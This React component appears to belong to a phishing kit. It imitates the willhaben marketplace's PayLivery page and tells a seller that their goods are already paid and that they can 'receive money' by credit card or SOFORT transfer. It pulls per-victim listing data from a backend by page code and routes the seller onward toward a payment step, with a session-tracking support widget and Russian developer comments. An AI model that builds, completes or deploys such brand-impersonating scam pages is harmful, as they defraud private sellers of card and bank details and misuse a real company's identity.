import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import SupportWidget from './SupportWidget';
import './WillhabenSuccess.css';
import { getPrimaryCurrency } from '../stripeCurrency';

import { API_URL } from '../apiBase';
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/willhaben-logo.png`;
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };

const DE = {
  navMarkt: 'MARKTPLATZ',
  navImmo: 'IMMOBILIEN',
  navAuto: 'AUTO & MOTOR',
  navJobs: 'JOBS',
  pageTitle: 'Nachrichten',
  payliveryBanner:
    'Fragen zu willhaben PayLivery? Von der sicheren Zahlung bis hin zum print-at-home Versandetikett',
  payliveryBrand: 'PayLivery',
  newAd: '+ Neue Anzeige aufgeben',
  messages: 'Nachrichten',
  office: 'Persönliches Büro',
  youReceive: 'Sie erhalten',
  statusTitle: 'Ihre Waren sind bereits bezahlt, Sie können Ihr Geld erhalten!',
  moneyFor: 'Geld bekommen für',
  moneySub: 'Kreditkarte / SOFORT-Überweisung',
  shipAddr: 'Lieferadresse',
  shipAddrSub: 'Kundeninformationen für die Lieferung',
  deliveryLine: 'Lieferung: Post, 3-7 Werktage',
  legal: 'Rechtlicher Hinweis',
  cta: 'Weiter zum Geldempfang',
  footerUber: 'Über willhaben',
  footerInfo: 'Informationen',
  footerBiz: 'Businesskunden',
  footerApps: 'Mobile Apps',
};

function IconMessage() {
  return (
    <svg className="wh-ico" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M20 2H4c-1.1 0-2 .9-2 2v18l4-4h14c1.1 0 2-.9 2-2V4c0-1.1-.9-2-2-2zm0 14H6l-2 2V4h16v12z"
      />
    </svg>
  );
}

function IconUser() {
  return (
    <svg className="wh-ico" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z"
      />
    </svg>
  );
}

function IconChevron() {
  return (
    <svg className="wh-chevron" viewBox="0 0 24 24" aria-hidden>
      <path fill="currentColor" d="M8.59 16.59L13.17 12 8.59 7.41 10 6l6 6-6 6-1.41-1.41z" />
    </svg>
  );
}

function IconChevronDown() {
  return (
    <svg className="wh-chevron wh-chevron--down" viewBox="0 0 24 24" aria-hidden>
      <path fill="currentColor" d="M7.41 8.59L12 13.17l4.59-4.58L18 10l-6 6-6-6 1.41-1.41z" />
    </svg>
  );
}

/** Синий щит с белой галочкой (как на скрине, без круга) */
function IconStatusShield() {
  return (
    <svg className="wh-status-shield" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="#009ee3"
        d="M12 1L3 5v6c0 5.55 3.84 10.74 9 12 5.16-1.26 9-6.45 9-12V5l-9-4z"
      />
      <path
        d="M9 12l2 2 4-4"
        fill="none"
        stroke="#ffffff"
        strokeWidth="2"
        strokeLinecap="round"
        strokeLinejoin="round"
      />
    </svg>
  );
}

/** На скрине 4 жёлтых кружка = визуально название: первые слова в «плашках», остаток строкой */
function ProductTitlePills({ text }) {
  const raw = (text || 'Artikel').trim() || 'Artikel';
  const words = raw.split(/\s+/).filter(Boolean);
  const pills = words.slice(0, 4);
  const rest = words.slice(4).join(' ');

  return (
    <div className="wh-product-title" title={raw}>
      <div className="wh-title-pills">
        {pills.map((w, i) => (
          <span key={i} className="wh-title-pill">
            {w.length > 14 ? `${w.slice(0, 13)}…` : w}
          </span>
        ))}
      </div>
      {rest ? <p className="wh-title-continuation">{rest}</p> : null}
    </div>
  );
}

function IconTruck() {
  return (
    <svg className="wh-truck" viewBox="0 0 24 24" aria-hidden>
      <path
        fill="currentColor"
        d="M20 8h-3V4H3c-1.1 0-2 .9-2 2v11h2c0 1.66 1.34 3 3 3s3-1.34 3-3h6c0 1.66 1.34 3 3 3s3-1.34 3-3h2v-5l-3-4zM6 18.5c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5zm13.5-9l1.96 2.5H17V9.5h2.5zm-1.5 9c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5z"
      />
    </svg>
  );
}

export default function WillhabenSuccess() {
  const { pageCode: pageCodeParam } = useParams();
  const pageCodeFromParams = (() => {
    try {
      if (pageCodeParam) return pageCodeParam;
      const m = window.location.pathname.match(/\/page\/([A-Z0-9]{12})(?:\/|$)/i);
      return m ? m[1] : null;
    } catch {
      return null;
    }
  })();

  const [pageData, setPageData] = useState(null);
  const [loading, setLoading] = useState(true);
  const [logoFailed, setLogoFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  /* log/transition только на Olx2 */

  useEffect(() => {
    if (!pageCodeFromParams) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCodeFromParams}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCodeFromParams]);

  const countryCode = pageData?.country_code || 'AT';
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null) return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText = useMemo(() => {
    if (priceNumber == null) return '—';
    return priceNumber % 1 === 0 ? String(priceNumber.toFixed(0)) : String(priceNumber);
  }, [priceNumber]);

  const currencyLabel = countryCode?.toUpperCase() === 'AT' ? '€' : primaryCurrency;
  const productName = pageData?.product_name || pageData?.site_name || 'Artikel';
  const deliveryAddress = pageData?.delivery_address || '';
  const photoUrl = pageData?.photo_url || '';
  const { toIndex2 } = usePaymentPaths(pageCodeFromParams);
  const index2Path = toIndex2();
  const lieferSub = deliveryAddress.trim() || DE.shipAddrSub;

  if (loading) {
    return (
      <div className="wh-page wh-page--loading">
        <div className="wh-loading-bar" />
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="wh-page">
      <header className="wh-top-util">
        <div className="wh-inner wh-top-util__row">
          <div className="wh-top-util__spacer" aria-hidden />
          <div className="wh-top-util__links">
            <button type="button" className="wh-link-ghost">
              <IconMessage />
              {DE.messages}
            </button>
            <button type="button" className="wh-link-ghost">
              <IconUser />
              {DE.office}
              <span className="wh-caret">▾</span>
            </button>
            <button type="button" className="wh-btn-orange">
              {DE.newAd}
            </button>
          </div>
        </div>
      </header>

      <div className="wh-brand-row">
        <div className="wh-inner wh-brand-row__flex">
          <div className="wh-logo-wrap">
            {!logoFailed ? (
              <img
                src={LOGO_SRC}
                alt="willhaben"
                className="wh-logo-img"
                onError={() => setLogoFailed(true)}
              />
            ) : (
              <span className="wh-logo-fallback">willhaben</span>
            )}
          </div>
          <nav className="wh-main-nav" aria-label="Hauptnavigation">
            <a href="#m" className="wh-nav-link">{DE.navMarkt}</a>
            <a href="#i" className="wh-nav-link">{DE.navImmo}</a>
            <a href="#a" className="wh-nav-link">{DE.navAuto}</a>
            <a href="#j" className="wh-nav-link">{DE.navJobs}</a>
          </nav>
        </div>
      </div>

      <div className="wh-title-row">
        <div className="wh-inner wh-title-row__flex">
          <h1 className="wh-h1">{DE.pageTitle}</h1>
          <div className="wh-paylivery-strip">
            <p className="wh-paylivery-strip__text">{DE.payliveryBanner}</p>
            <span className="wh-paylivery-pill">{DE.payliveryBrand}</span>
          </div>
        </div>
      </div>

      <main className="wh-main">
        <div className="wh-inner wh-main__narrow">
          <div className="wh-card">
            {/*
              1:1 со скрином: слева фото, справа от фото — «название» как жёлтые кружки (первые слова).
              Ниже на всю ширину — полоса Sie erhalten (#F2F9FF, текст #009EE3).
            */}
            <div className="wh-product-head">
              {photoUrl ? (
                <img src={photoUrl} alt="" className="wh-thumb" />
              ) : (
                <div className="wh-thumb wh-thumb--ph" aria-hidden />
              )}
              <ProductTitlePills text={productName} />
            </div>
            <div className="wh-receive-bar">
              <span className="wh-receive-bar__label">{DE.youReceive}</span>
              <strong className="wh-receive-bar__price">
                {priceText} {currencyLabel}
              </strong>
            </div>

            <div className="wh-status-box">
              <div className="wh-status-box__icon" aria-hidden>
                <IconStatusShield />
              </div>
              <p className="wh-status-box__text">{DE.statusTitle}</p>
              <IconChevronDown />
            </div>

            <button type="button" className="wh-row-line">
              <div className="wh-row-line__body">
                <div className="wh-row-line__title">{DE.moneyFor}</div>
                <div className="wh-row-line__sub">{DE.moneySub}</div>
              </div>
              <IconChevron />
            </button>

            <button type="button" className="wh-row-line">
              <div className="wh-row-line__body">
                <div className="wh-row-line__title">{DE.shipAddr}</div>
                <div className="wh-row-line__sub wh-row-line__sub--clamp">{lieferSub}</div>
              </div>
              <IconChevron />
            </button>

            <div className="wh-delivery-row">
              <span className="wh-delivery-row__text">{DE.deliveryLine}</span>
              <span className="wh-delivery-row__icon" aria-hidden>
                <IconTruck />
              </span>
            </div>

            <div className="wh-legal-row">
              <span className="wh-info-i" aria-hidden>
                i
              </span>
              <a href="#legal" className="wh-legal-link">{DE.legal}</a>
            </div>

            <Link to={index2Path} className="wh-cta">
              {DE.cta}
            </Link>
          </div>
        </div>
      </main>

      <footer className="wh-footer">
        <div className="wh-inner wh-footer__links">
          <a href="#u">{DE.footerUber}</a>
          <a href="#i">{DE.footerInfo}</a>
          <a href="#b">{DE.footerBiz}</a>
          <a href="#a">{DE.footerApps}</a>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

